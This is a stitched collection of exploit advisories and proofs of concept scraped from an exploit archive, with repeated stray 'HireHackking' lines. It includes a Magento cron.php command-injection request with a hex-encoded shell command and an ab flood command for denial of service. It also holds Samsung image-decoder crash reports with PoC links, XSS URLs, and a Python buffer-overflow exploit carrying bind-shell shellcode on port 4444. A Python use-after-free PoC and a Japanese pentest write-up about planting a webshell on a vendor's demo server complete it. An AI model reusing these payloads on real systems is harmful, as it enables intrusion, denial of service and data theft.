GET /magento/$(`echo%20-e%20\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/exec.php HTTP/1.1

which would execute:

/bin/sh /var/www/magento/exec_poc/$(`echo -e \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &

resulting in creating the PoC file:

victim$ ls -l /tmp/magento_exec 
-rw-r--r-- 1 www-data www-data 0 Jul 26 11:20 /tmp/magento_exec



C) Denial of Service

By sending multiple requests to cron.php, for example using apache benchmark
tool:

attacker$ ab -n 500 -c 30  http://victim_magento_site/magento/cron.php

attacker could exploit the lack of locking to spawn numerous processes,
potentially leading to resource exhaustion and a DoS condition.

The above command would result in creating multiple instances of the
cron.php/cron.sh scripts on the target host:

...
www-data  5529  0.2  1.3 287756  6872 ?        Rl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data  5531  0.2  1.1 288000  5848 ?        Dl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data  5533  0.2  1.2 288000  6432 ?        Dl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5535  0.3  1.2 288000  6484 ?        Dl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5537  0.3  1.5 288768  7740 ?        Dl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5539  0.3  1.3 287524  6956 ?        Rl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5541  0.3  1.4 288768  7168 ?        Dl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5543  0.3  1.4 288288  7188 ?        Rl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5546  0.3  1.4 288512  7188 ?        Rl   10:02   0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data  5885  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5886  0.0  0.0  17880   456 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5887  0.0  0.0  17880   456 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5888  0.0  0.0  17880   440 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5889  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5890  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5891  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5899  0.0  0.0  17880   496 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5900  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5901  0.0  0.0  17880   496 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data  5904  0.0  0.0  17880   500 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5907  0.0  0.0  17880   496 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data  5909  0.0  0.0  17880   500 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data  5910  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data  5912  0.0  0.0  17880   464 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data  5913  0.0  0.0  17880   460 ?        S    10:03   0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
...

VI. BUSINESS IMPACT
-------------------------

The issue has been rated as medium. Depending on the Magento hosting features
and applied patches code execution could be possible which would increase the 
risks.
 
VII. SYSTEMS AFFECTED
-------------------------

The latest version of eBay Magento CE (1.9.2.1) was confirmed to contain
the vulnerable cron.php script.
The Magento EE versions also contain this problem according to the vendor's
advisory.

VIII. SOLUTION
-------------------------

eBay Magento assigned this issue the ID of APPSEC-1037 and supplied a patch
for it within the SUPEE-6788 patch bundle available on the official website.
The patch adds sanitisation functions around the shell_exec() code however
the cron script remains publicly accessible.

It is recommended to protect the cron script by other means.
For example, the script could require a key supplied together with a GET
request to proceed with the execution which is commonly used with other
major open source solutions.
The easiest way would also be restricting acess to the script to only
certain IPs or localhost within the web server configuration.

 
IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Magento-Unrestricted-Cron-Script-Vulnerability.txt

Oficial eBay Magento website:
http://magento.com/

Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML 
Functionality Using Multibyte Payloads' (APPSEC-1037) is available at:
 
https://magento.com/security/patches/supee-6788


X. CREDITS
-------------------------

The vulnerabilities have been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
 
XI. REVISION HISTORY
-------------------------

Nov 6th, 2015:  Advisory released
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=497

Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.

I/DEBUG   ( 2961): pid: 12383, tid: 12549, name: thread-pool-1  >>> com.sec.android.gallery3d <<<
I/DEBUG   ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000

I/DEBUG   ( 2961):     x0   0000000089e8117c  x1   00000000000000ff  x2   00000000177fe13c  x3   0000000089e8117c
I/DEBUG   ( 2961):     x4   0000000000000004  x5   0000007f65f42300  x6   0000000000000002  x7   ffffffffffffffff
I/DEBUG   ( 2961):     x8   0000000089e83ff0  x9   0000007f65f020b0  x10  000000000000003c  x11  000000000000003b
I/DEBUG   ( 2961):     x12  0000007f65f02080  x13  00000000ffffffff  x14  0000007f65f02080  x15  00000000000061e0
I/DEBUG   ( 2961):     x16  0000007f6baccc10  x17  0000007f958f8d80  x18  0000007f9596da40  x19  0000007f65f0e180
I/DEBUG   ( 2961):     x20  0000007f65f54020  x21  00000000002f0020  x22  0000000000000020  x23  0000000005e00400
I/DEBUG   ( 2961):     x24  0000000000000004  x25  0000007f65f42300  x26  0000000000000020  x27  0000007f65f52080
I/DEBUG   ( 2961):     x28  00000000000001da  x29  0000000013071460  x30  0000007f6ba7e40c
I/DEBUG   ( 2961):     sp   0000007f66796130  pc   0000007f958f8e28  pstate 0000000020000000
I/DEBUG   ( 2961): 
I/DEBUG   ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller 
I/DEBUG   ( 2961):     #00 pc 0000000000019e28  /system/lib64/libc.so (memset+168)
I/DEBUG   ( 2961):     #01 pc 0000000000030408  /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG   ( 2961):     #02 pc 0000000000033440  /system/lib64/libSecMMCodec.so (DecodeFile+120)
I/DEBUG   ( 2961):     #03 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG   ( 2961):     #04 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex

To reproduce, download the file and open it in Gallery.

This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip
HireHackking 
source: https://www.securityfocus.com/bid/60853/info

Nameko is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nameko 0.10.146 and prior are vulnerable. 

http://www.example.com/nameko.php?op=999&id=&colorset=VIOLET&fontsize=11%3B+%7D%3C%2Fstyle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cstyle%3EBODY+%7B+font-size%3A66
HireHackking 
source: https://www.securityfocus.com/bid/60859/info

Atomy Maxsite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Atomy Maxsite versions 1.50 through 2.5 are vulnerable. 

http://www.example.com/[path]/index.php?name=research&file=add&op=research_add
HireHackking 
source: https://www.securityfocus.com/bid/60860/info

The Xorbin Analog Flash Clock plugin is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Xorbin Analog Flash Clock 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1);
HireHackking 
#!/usr/bin/python
# EXPLOIT TITLE: GOLD PLAYER Local Exploit
# AUTHOR: Vivek Mahajan - C3p70r
# Credits: Gabor Seljan  
# Date of Testing: 30 October 2015
# Download Link : http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html
# Tested On : Windows 8.1 Pro and Windows 7 Ultimate
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Open the file buffer.txt and copy the contents.
# Step 4: Open the Gold Player application -> file -> open flash url and paste the contents
# Step 5: Click on Open
# That should open a bind tcp port at 4444
# Step 4: Connect with netcat at port 4444


buffer = "A"*280

buffer += "\x83\x34\x04\x10"

buffer += "\x90"*100

buffer += ("\xba\x01\x75\x34\x3a\xdb\xd4\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x53\x31\x57\x12\x03\x57\x12\x83\xc6\x71\xd6\xcf\x34\x91\x94"
"\x30\xc4\x62\xf9\xb9\x21\x53\x39\xdd\x22\xc4\x89\x95\x66\xe9"
"\x62\xfb\x92\x7a\x06\xd4\x95\xcb\xad\x02\x98\xcc\x9e\x77\xbb"
"\x4e\xdd\xab\x1b\x6e\x2e\xbe\x5a\xb7\x53\x33\x0e\x60\x1f\xe6"
"\xbe\x05\x55\x3b\x35\x55\x7b\x3b\xaa\x2e\x7a\x6a\x7d\x24\x25"
"\xac\x7c\xe9\x5d\xe5\x66\xee\x58\xbf\x1d\xc4\x17\x3e\xf7\x14"
"\xd7\xed\x36\x99\x2a\xef\x7f\x1e\xd5\x9a\x89\x5c\x68\x9d\x4e"
"\x1e\xb6\x28\x54\xb8\x3d\x8a\xb0\x38\x91\x4d\x33\x36\x5e\x19"
"\x1b\x5b\x61\xce\x10\x67\xea\xf1\xf6\xe1\xa8\xd5\xd2\xaa\x6b"
"\x77\x43\x17\xdd\x88\x93\xf8\x82\x2c\xd8\x15\xd6\x5c\x83\x71"
"\x1b\x6d\x3b\x82\x33\xe6\x48\xb0\x9c\x5c\xc6\xf8\x55\x7b\x11"
"\xfe\x4f\x3b\x8d\x01\x70\x3c\x84\xc5\x24\x6c\xbe\xec\x44\xe7"
"\x3e\x10\x91\x92\x36\xb7\x4a\x81\xbb\x07\x3b\x05\x13\xe0\x51"
"\x8a\x4c\x10\x5a\x40\xe5\xb9\xa7\x6b\x18\x66\x21\x8d\x70\x86"
"\x67\x05\xec\x64\x5c\x9e\x8b\x97\xb6\xb6\x3b\xdf\xd0\x01\x44"
"\xe0\xf6\x25\xd2\x6b\x15\xf2\xc3\x6b\x30\x52\x94\xfc\xce\x33"
"\xd7\x9d\xcf\x19\x8f\x3e\x5d\xc6\x4f\x48\x7e\x51\x18\x1d\xb0"
"\xa8\xcc\xb3\xeb\x02\xf2\x49\x6d\x6c\xb6\x95\x4e\x73\x37\x5b"
"\xea\x57\x27\xa5\xf3\xd3\x13\x79\xa2\x8d\xcd\x3f\x1c\x7c\xa7"
"\xe9\xf3\xd6\x2f\x6f\x38\xe9\x29\x70\x15\x9f\xd5\xc1\xc0\xe6"
"\xea\xee\x84\xee\x93\x12\x35\x10\x4e\x97\x45\x5b\xd2\xbe\xcd"
"\x02\x87\x82\x93\xb4\x72\xc0\xad\x36\x76\xb9\x49\x26\xf3\xbc"
"\x16\xe0\xe8\xcc\x07\x85\x0e\x62\x27\x8c")

buffer += ".swf"

file = open('buffer.txt', 'w')
file.write(buffer)
file.close()


# Follow on Twitter @vik_create
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=499

The attached files cause memory corruption when they are scanned by the face recognition library in android.media.process.

From faces-art.bmp

F/libc    (11305): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 11555 (Thread-1136)
I/DEBUG   ( 2955): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 2955): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG   ( 2955): Revision: '10'
I/DEBUG   ( 2955): ABI: 'arm64'
I/DEBUG   ( 2955): pid: 11305, tid: 11555, name: Thread-1136  >>> android.process.media <<<
I/DEBUG   ( 2955): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG   ( 2955):     x0   0000007f94ca2100  x1   0000007f94c63480  x2   0000007f94c0e200  x3   0000000000000000
I/DEBUG   ( 2955):     x4   0000000000000000  x5   0000000000000040  x6   000000000000003f  x7   0000000000000000
I/DEBUG   ( 2955):     x8   0000007f94c0e240  x9   0000000000000004  x10  000000000000003b  x11  000000000000003a
I/DEBUG   ( 2955):     x12  0000007f94c02080  x13  00000000ffffffff  x14  0000007f94c02080  x15  000000000151c5e8
I/DEBUG   ( 2955):     x16  0000007f885fe900  x17  0000007f9ee60d80  x18  0000007f9eed5a40  x19  0000007f94c1d100
I/DEBUG   ( 2955):     x20  0000000000000000  x21  0000007f94c65150  x22  0000007f949d0550  x23  0000007f94c1d110
I/DEBUG   ( 2955):     x24  0000000012d39070  x25  0000000000000066  x26  0000000012d23b80  x27  0000000000000066
I/DEBUG   ( 2955):     x28  0000000000000000  x29  0000007f949cfd70  x30  0000007f87acd200
I/DEBUG   ( 2955):     sp   0000007f949cfd70  pc   0000000000000000  pstate 0000000040000000
I/DEBUG   ( 2955): 
I/DEBUG   ( 2955): backtrace:
I/DEBUG   ( 2955):     #00 pc 0000000000000000  <unknown>
I/DEBUG   ( 2955):     #01 pc 0000000000000001  <unknown>
I/DEBUG   ( 2955):     #02 pc 26221b0826221b08  <unknown>

To reproduce, download the attached file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38611.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=500

There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.

D/skia    (10905): GIF - Parse error
D/skia    (10905): --- decoder->decode returned false
F/libc    (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
I/DEBUG   ( 2958): pid: 10905, tid: 11276, name: thread-pool-0  >>> com.sec.android.gallery3d <<<
I/DEBUG   ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
I/DEBUG   ( 2958):     x0   0000000000000001  x1   0000000089f725ac  x2   0000000000000000  x3   00000000fff9038c
I/DEBUG   ( 2958):     x4   0000007f9c300000  x5   000000000000001f  x6   0000000000000001  x7   0000007f9c620048
I/DEBUG   ( 2958):     x8   0000000000000000  x9   0000000000000000  x10  0000000000000080  x11  0000000000003758
I/DEBUG   ( 2958):     x12  0000000000000020  x13  0000000000000020  x14  00000000000000a5  x15  000000000000001f
I/DEBUG   ( 2958):     x16  00000000ffffe4e3  x17  00000000000000a5  x18  0000007f9c300000  x19  0000007f9c61fc00
I/DEBUG   ( 2958):     x20  0000007f9c664080  x21  0000000089e76b2c  x22  000000000000003b  x23  0000000000000001
I/DEBUG   ( 2958):     x24  0000000000000020  x25  0000000000000020  x26  0000000000000020  x27  0000007f9c664080
I/DEBUG   ( 2958):     x28  00000000000001da  x29  0000000032e89ae0  x30  0000007faad70e64
I/DEBUG   ( 2958):     sp   0000007f9cfff170  pc   0000007faad72dbc  pstate 0000000080000000
I/DEBUG   ( 2958): 
I/DEBUG   ( 2958): backtrace:
I/DEBUG   ( 2958):     #00 pc 000000000002ddbc  /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG   ( 2958):     #01 pc 000000000002be60  /system/lib64/libSecMMCodec.so (decodeGIF+340)
I/DEBUG   ( 2958):     #02 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG   ( 2958):     #03 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex

To reproduce, download the file and open it in Gallery

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38610.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=498

The attached jpg, upsample.jpg can cause memory corruption when media scanning occurs

F/libc    ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG   ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG   ( 2956): Revision: '10'
I/DEBUG   ( 2956): ABI: 'arm64'
I/DEBUG   ( 2956): pid: 8600, tid: 8685, name: HEAVY#0  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG   ( 2956):     x0   0000007f8cef2ab0  x1   0000000000000002  x2   0000007f8cef2ab0  x3   0000007f8ce5a390
I/DEBUG   ( 2956):     x4   0000007f8cef28d0  x5   3d206e6f69747562  x6   0000007f8cef29f0  x7   42e34ca342e32177
I/DEBUG   ( 2956):     x8   42e390a242e37199  x9   42dfe02f42debc0f  x10  42e06c3442e03665  x11  42e0afd542e08c24
I/DEBUG   ( 2956):     x12  42e1070042e0e62d  x13  42e1830842e146da  x14  42e1f53342e1add4  x15  00000000000014a4
I/DEBUG   ( 2956):     x16  0000007f9f0d6ae0  x17  0000007fa3e7e880  x18  0000007f8ce75c60  x19  0000007f8cebe000
I/DEBUG   ( 2956):     x20  0000000000000001  x21  0000007f8cebe000  x22  0000000000000001  x23  0000000000000000
I/DEBUG   ( 2956):     x24  0000000000000000  x25  0000000000000000  x26  0000000010000000  x27  0000007f8c5ff050
I/DEBUG   ( 2956):     x28  0000007f8ce77800  x29  000000000000001c  x30  0000007f9f09fff8
I/DEBUG   ( 2956):     sp   0000007f8d0fea20  pc   0000007f9f09e83c  pstate 0000000080000000
I/DEBUG   ( 2956): 
I/DEBUG   ( 2956): backtrace:
I/DEBUG   ( 2956):     #00 pc 000000000009b83c  /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG   ( 2956):     #01 pc 000000000009cff4  /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG   ( 2956):     #02 pc 0000000000035700  /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG   ( 2956):     #03 pc 0000000000041f08  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG   ( 2956):     #04 pc 00000000000428d4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 2956):     #05 pc 0000000000042a08  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG   ( 2956):     #06 pc 000000000004420c  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG   ( 2956):     #07 pc 00000000000a4234  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 2956):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 2956):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG   ( 2956):     #10 pc 00000000000018ec  /system/framework/arm64/saiv.odex

To reproduce, download the image file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip
HireHackking 
Title: Python 2.7 array.fromstring Use After Free
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-array-fromstring-Use-After-Free
Url2: http://bugs.python.org/issue24613
Resolution: Fixed

The Python 2.7 array.fromstring() method suffers from a use after free caused by unsafe realloc use. The issue is triggered when an array is concatenated to itself via fromstring() call:

static PyObject *
array_fromstring(arrayobject *self, PyObject *args)
{
    char *str;
    Py_ssize_t n;
    int itemsize = self->ob_descr->itemsize;
    if (!PyArg_ParseTuple(args, "s#:fromstring", &str, &n)) <<<< The str buffer is parsed from args. In cases where an array is passed to itself, self->ob_item == str.
        return NULL;
    if (n % itemsize != 0) {
        PyErr_SetString(PyExc_ValueError,
                   "string length not a multiple of item size");
        return NULL;
    }
    n = n / itemsize;
    if (n > 0) {
        char *item = self->ob_item; <<<< If str == self->ob_item, item == str.
        if ((n > PY_SSIZE_T_MAX - Py_SIZE(self)) ||
            ((Py_SIZE(self) + n) > PY_SSIZE_T_MAX / itemsize)) {
                return PyErr_NoMemory();
        }
        PyMem_RESIZE(item, char, (Py_SIZE(self) + n) * itemsize); <<<< A realloc call occurs here with item passed as the ptr argument. Because realloc sometimes calls free(), this means that item may be freed. If item was equal to str, str is now pointing to freed memory.
        if (item == NULL) {
            PyErr_NoMemory();
            return NULL;
        }
        self->ob_item = item;
        Py_SIZE(self) += n;
        self->allocated = Py_SIZE(self);
        memcpy(item + (Py_SIZE(self) - n) * itemsize,
               str, itemsize*n); <<<< If str is dangling at this point, a use after free occurs here.
    }
    Py_INCREF(Py_None);
    return Py_None;
}

In most cases when this occurs, the function behaves as expected; while the dangling str pointer is technically pointing to deallocated memory, given the timing it is highly likely the memory contains the expected data. However, ocassionally, an errant allocation will occur between the realloc and memcpy, leading to unexpected contents in the str buffer.

In applications that expose otherwise innocuous indirect object control of arrays as attack surface, it may be possible for an attacker to trigger the corruption of arrays. This could potentially be exploited to exfiltrate data or achieve privilege escalation, depending on subsequent operations performed using corrupted arrays.

A proof-of-concept follows:

import array
import sys
import random

testNumber = 0

def dump(value):
    global testNumber
    i = 0
    for x in value:
        y = ord(x)
        if (y != 0x41): 
            end = ''.join(value[i:]).index('A' * 0x10)
            sys.stdout.write("%08x a[%08x]: " % (testNumber, i))
            for z in value[i:i+end]: sys.stdout.write(hex(ord(z))[2:])
            sys.stdout.write('\r\n')
            break            
        i += 1

def copyArray():
    global testNumber
    while True:
        a=array.array("c",'A'*random.randint(0x0, 0x10000))
        a.fromstring(a)
        dump(a)
        testNumber += 1
    
print "Starting..."    
copyArray()

The script repeatedly creates randomly sized arrays filled with 0x41, then calls fromstring() and checks the array for corruption. If any is found, the relevant bytes are written to the console as hex. The output should look something like this:

Starting...
00000007 a[00000cdc]: c8684d0b0f54c0
0000001d a[0000f84d]: b03f4f0b8be620
00000027 a[0000119f]: 50724d0b0f54c0
0000004c a[00000e53]: b86b4d0b0f54c0
0000005a a[000001e1]: d8ab4609040620
00000090 a[0000015b]: 9040620104e5f0
0000014d a[000002d6]: 10ec620d8ab460
00000153 a[000000f7]: 9040620104e5f0
0000023c a[00000186]: 50d34c0f8b65a0
00000279 a[000001c3]: d8ab4609040620
000002ee a[00000133]: 9040620104e5f0
000002ff a[00000154]: 9040620104e5f0
0000030f a[00000278]: 10ec620d8ab460
00000368 a[00000181]: 50d34c0f8b65a0
000003b2 a[0000005a]: d0de5f0d05e5f0
000003b5 a[0000021c]: b854d00d3620
00000431 a[000001d8]: d8ab4609040620
0000044b a[000002db]: 10ec620d8ab460
00000461 a[000000de]: 9040620104e5f0
000004fb a[0000232f]: 10f74d0c0ce620
00000510 a[0000014a]: 9040620104e5f0

In some applications, such as those that are web-based, similar circumstances may manifest that would allow for remote exploitation.

To fix the issue, array_fromstring should check if self->ob_item is pointing to the same memory as str, and handle the copy accordingly.
HireHackking

0x00キーワードを使用して、ターゲットソースコードを取得します

ある朝、私は会社で浸透テストを実施するための一時的な取り決めを受けました。この浸透は主要なドメイン名を与え、サブドメインはありませんでした。ターゲットWebサイトを開いた後、最初に情報を収集しました。1049983-20220106103918120-1949305445.png

ミドルウェア: IIS 8.5 1049983-20220106103918574-542283566.png

管理者を入力して、それが自動的に追加されたことを発見しました/

それはそのディレクトリが存在することを意味しますので、ファイルの波を盲目的に推測する、login.aspx default.aspx main.aspxなど1049983-20220106103919310-1402173741.png

最後に、バックグラウンドログインページはlogin.aspxで見つかりました。これは弱いパスワードの波ではありませんか?

アカウントは、試用操作1049983-20220106103920127-1825260822.pngの後にロックされています

おなじみのスタートは、そうだから、他の方法しか試すことができないからです。

いくつかの情報は、ホームページ1049983-20220106103920974-1940392655.pngのHTMLコードで見つかりました

デザインと制作?次のドメイン名によると、それはウェブサイトの建物会社です

次に、これがポイントです。 IIS8.5+ASP.NET+サイト構築システム

バックアップファイルを最初にスキャンします1049983-20220106103921425-155429375.png

この開発者にとっては、400個以上のIPが問題ありません。 FOFAクエリツールを使用して、バッチ1049983-20220106103921829-1448871529.pngでエクスポートします

次に、バックアップファイルをスキャンします。ここでは、兄弟Bのスキャナー3https://github.com/breken5/webalivescanをお勧めします

バッチサバイバルスキャンとディレクトリスキャンを実行できます1049983-20220106103922341-218058023.png

いくつかのサイトの下にweb.zipバックアップファイルを見つけました。

ダウンロード後、ターゲットサイトファイルが比較されました。基本的に一貫した1049983-20220106103922901-1069820455.png

0x01コードを取得して監査して壁を何度も押し始めます

次に、監査を開始します。1049983-20220106103923815-1139109272.png

インターフェイスWebClient.DownLoadFile(リモートファイルのダウンロード)に敏感な操作を置く

この方法は絶対的なパスを提供する必要があるためです。それは頭痛ですが、関連するパラメーターに従っています。発見する。

この方法は別の方法で呼び出されます。1049983-20220106103924399-1355850887.png

server.mappathで渡されますが、絶対的なパスを見つける必要はありません。システムはあなたのためにそれを手配しました。

次に、POC:を構築します

ashx/api.ashx?m=downloadfilefilepath=asmx.jpgweburl=http://***。CN/1049983-20220106103925555-1905383795.png

アクセスアドレス1049983-20220106103926268-1173007218.png

ファイルが存在し、その後、証明が実現可能になります

ターゲットアドレス1049983-20220106103926962-1035196824.pngに戻ります

ファイルが固定されていません

引き続きコードに戻り、他の脆弱性を監査し、他のインターフェイスに複数の脆弱性があります。たとえば、ueditorリモートクロール脆弱性1049983-20220106103927586-1941905001.png

ファイルの名前変更は揺るがす可能性があります

1049983-20220106103928097-1137720979.png

ただし、これらのインターフェイスにはログイン1049983-20220106103928670-62149113.pngが必要です

これは頭痛であり、ログインを必要としないいくつかのインターフェイスでSQLインジェクションを見つけようとする予定です。

最後に、SQLステッチがどこかで発見されました。1049983-20220106103929492-118196344.png

しかし、ここでは、ISSAFESQLSTRING検出は1049983-20220106103930051-247295581.pngと呼ばれます

一般的なシンボルは基本的に立ち往生しています

0x02開発者を取り、一般アカウントの逆暗号化と復号化アルゴリズムを見つけます

それらはすべて同じWebサイトビルディングプログラムを使用しているため、プログラムに組み込みアカウントがあると疑われています。

それで、私は監査したばかりの抜け穴を渡す準備をしました。同じプログラムサイトから始めます

最後に、特定のサイトでウェブシェルを正常に手に入れました

関連情報1049983-20220106103930560-496241117.pngをご覧ください

これは実際にはメーカーのデモサイトグループであり、開発者のすべてのサイトソースコードが保存されています。

開発プロセス中に多くのデモ環境があるはずであり、すべての顧客がそれらを持っていると推定されています。

サーバーを介してターゲットサイト1049983-20220106103931009-71314533.pngのデモWebサイトにめくりました

ルートディレクトリには、ZIP WebサイトのバックアップとSQLデータベースバックアップがあります。

ターゲットサイトが直接移動された場合、バックエンドアカウントのパスワードは同じでなければなりません。

SQLファイルをダウンロードします。関連情報1049983-20220106103931570-1846651994.pngを検索します

アカウントに挿入されたSQLステートメントが見つかりました。そのパスワードは、1049983-20220106103932232-1921050966.pngで暗号化されています

CMD5のロックを解除できないため、Ciphertextを33ビット暗号化として見ました。

ただし、ログインプロセス中、パスワードはRSA暗号化後に送信されますが、バックエンドは実際には33ビットMD5暗号化です。

ソースコードのため、ログインメソッドを追跡しました。1049983-20220106103933554-2142229781.png

パスワードが渡された後、Commfun.ENPWDが暗号化のために呼び出されます。

ENPWDメソッド1049983-20220106103934086-1207557966.pngの追跡

